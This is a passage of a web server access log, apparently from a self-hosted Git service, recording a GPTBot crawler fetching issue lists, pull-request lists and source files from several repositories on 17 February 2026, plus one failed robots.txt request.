compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10261] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10088] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10256] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:19:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11275] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:19:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 13015] [Gzip 3.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:19:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:19:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:19:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" -[17/Feb/2026:19:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11233] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:19:16:11 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11234] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:19:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 11208] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:19:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11234] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:19:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" -[17/Feb/2026:19:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=open&type=all" -[17/Feb/2026:19:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:16:20 +0000] - 200 200 - GET https 